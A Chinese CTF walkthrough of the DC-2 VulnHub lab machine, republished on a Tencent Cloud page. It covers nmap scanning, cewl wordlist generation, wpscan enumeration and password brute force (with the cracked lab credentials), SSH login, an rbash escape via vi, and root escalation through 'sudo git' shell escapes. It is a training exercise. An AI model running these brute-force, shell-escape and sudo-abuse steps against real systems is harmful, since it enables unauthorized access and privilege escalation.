DC-2

DC-2靶机的学习

靶场下载链接:

Download: http://www.five86.com/downloads/DC-2.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-2.zip
Download (Torrent): https://download.vulnhub.com/dc/DC-2.zip.torrent ( Magnet)

环境

VMware:DC-2 IP:192.168.236.141
攻击机:kali linux IP:192.168.236.133

老规矩,上来就是nmap

nmap -A 192.168.236.141

只是开了80?先看看80吧。

在这里要配置本地dns解析,将目标ip地址(192.168.44.133 dc-2)添加进hosts中。

确定了CMS是wordpress的和flag1。flag1中提示我们使用cewl生成一个通用的字典,并且告诉了我们flag2在后台中。

Cewl是一种采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添加额外的外部链接,然后Cewl会给你返回一个字典文件,你可以把字典用到另外,Cewl还提供了命令行工具。

思路可以这样:使用Cewl生成一个字典,然后使用wpscan对wordpress进行破解。

cewl http://dc-2 -w /home/l/桌面/ad/dc-2.txt

看到字典生成了。

使用wpscan进行一下信息收集

wpscan -u http://dc-2

拿到了版本是word press 4.7.10的 别的没什么好利用的。后台也没找到。爆破密码吧。

wpscan --url http://dc-2  -e u 枚举出三个用户名 admin jerry 和 tome

把那3个用户名做一个字典,名字为dc2user.txt,开始爆破密码。

wpscan --url http://dc-2  -U "/home/l/桌面/ad/dc2user.txt" -P "/home/l/桌面/ad/dc-2.txt"

爆破出来Jerry和tom的 密码是`Username: jerry, Password: adipiscing tom / parturient

妈的,后台地址还没找到。信息收集没做好。

使用dirb 做一个简单的目录扫描
dirb http://dc-2/
发现后台地址
http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1
发现多个遍历,但是没有可以下载的东西没什么用。

对不起,没有试一试默认的后台地址是我的错。登录一下 http://dc-2/wp-admin

拿到flag2,它提示:

如果你不能利用WordPress并抄近路,还有别的办法。
希望你能找到另一个切入点。

跟没说一样。操!!!

好吧,人生路漫漫。我们来看看后台有什么可以利用的。能不能拿下webshell什么的。 并没有找到。

来看看 nmap -A -p- 192.168.236.141 进行一个全端口扫描吧,看看有没有ftp,ssh什么的。

7744端口运行有ssh服务,我们看看能不能使用tomJerry登录进去。

ssh tom@192.168.236.141  -p  7744

使用tom成功登录进去ssh,额,使用echo $SHELL发现是受限制的user 也就是Restricted Shell它与一般标准shell的区别在于会限制执行一些行为。

系统运维人员一般都会给Linux shell加上一些限制来防止入侵,通常会阻止运行某些特定的命令。

我们来检查可用的命令:cd ls ehco等等,检查可用的编程语言,如python、perl、ruby等,检查环境变量运行env或者printenv还有 / 等等。。。这相当于一个收集情报的工作,这个步骤必不可少,有了情报才可以分析下一步骤该如何去做。

使用echo ¥PATH查看命令存放的地方。 使用ls usr/bin检查发现less ls scp vi可以使用。

那我们使用vi 看看能不能绕过了rbash。

:set shell =/bin/sh
:shell

设置一下环境变量

export PATH =$PATH:/bin
export PATH=$PATH:/usr/bin

成功绕过了rbashcat命令查看flag3.txt

这个flag中说:

什么玩意???不管了 cd .. 回到主目录 ls -l命令查看一下权限。

既然如此,那我们直接使用 find / -name “flag4.txt” 查找flag吧。

flag4.txt/home/jerry中,使用cat /home/jerry/flag4.txt查看flag4

小朋友,你是不是有很多问好???????????

在访问root文件发现没有权限,看来flag5root中,也就是说我们要提权。

提权之前,做一下信息收集吧

查看发行版
cat /etc/issue
cat /etc/*-release

查看内核版本
uname -a

好吧,什么也没发现。我们su jerry看看 ls -l sudo -l 收集一波信息。

这个git不用root密码的。那我们看看利用一下吧。

git提权

sudo git help config
    !/bin/bash或者!'sh'完成提权

sudo git  -p help
    !/bin/bash

成功提权。cd root 然后 ls cat final-flag.txt

_ _ / / / ___| | | __| | _ / \ / / / | | / _` |/ | '_ / _ / / / / __/ | | | (_| | (_) | | | | __/_/ / / _|_|_| __,_|___/|_| |_|_/

Congratulatons!!!

A special thanks to all those who sent me tweets and provided me with feedback - it's all greatly appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

88 DC3-见

本文分享自微信公众号 - 黑白天(li0981jing),作者:cn0sec

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-04-12

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 内网渗透测试基础学习笔记

    cn0sec 基础渗透笔记,内网学习笔记,工具学习笔记 2020-03-05

    cn0sec
  • DC-1

    开放了22的ssh 80的http apache 111的 rpcbind等等。 重点看看到在80端口上运行着Drupal 7和一些敏感的目录文件等等。

    cn0sec
  • DC-6

    Kali :192.168.50.128 DC-6 :192.168.50.130

    cn0sec
  • 服务器文件同步管理

    前几天有台服务器电源坏了,还好数据没有丢。因此必须做好服务器文件内容的备份。服务器主要是用来提供网站服务,带着一个数据库,数据库可以用分发和订阅来解决,网页文件...

    跟着阿笨一起玩NET
  • “互联网+”,河北大城做对了什么?┃腾讯研究院案例调研

    随着互联网的快速发展,“互联网+”融入到各个领域。河北省廊坊市大城县抓住发展机遇,依托良好的地理位置与产业优势,通过与腾讯、阿里等互联网公司的合作,将“互联网+...

    腾讯研究院
  • Convert Access files to Pocket Access using Activesync 4.2 on windows mobile 5.0

        在06年的时候,我在Embedded Visual C++4.0的开发环境下,写了一个利用ADOCE来访问Pocket Access的程序,具体可以参考...

    ShiJiong
  • 《spss统计分析与行业应用案例详解》实例37重复测量方差分析

    重复测量方差分析可以考察观测指标是否会随着测量次数的增加而变化,以及是否会受时间的影响。

    统计学家
  • [Go 语言社区]服务器读取配置文件只-json数据

    package main // 导入需要的库 import ( "encoding/json" "fmt" ) // 结构体定义 type ...

    李海彬
  • 2017美国数学建模ICM D题 优化机场安全的乘客吞吐量检查点(Optimizing the Passenger Throughput at an Airport Security Checkpo)

    2001年9月11日美国发生恐怖袭击事件之后,机场安全问题在世界各地得到显著增强。 机场有安全检查站,乘客和他们的行李会被筛查爆炸物和其他危险项目。 这些安全措...

    大黄大黄大黄
  • [LeetCode Weekly Contest 90]856.括号的分数

    不包含任何内容的括号()得一分,事实上我们可以将()替换为1,这样题目就变成了1得一分,并列的部分得分相加,括号内的部分得分乘以2,四个示例就转换为了:

    ★忆先★

扫码关注云+社区

领取腾讯云代金券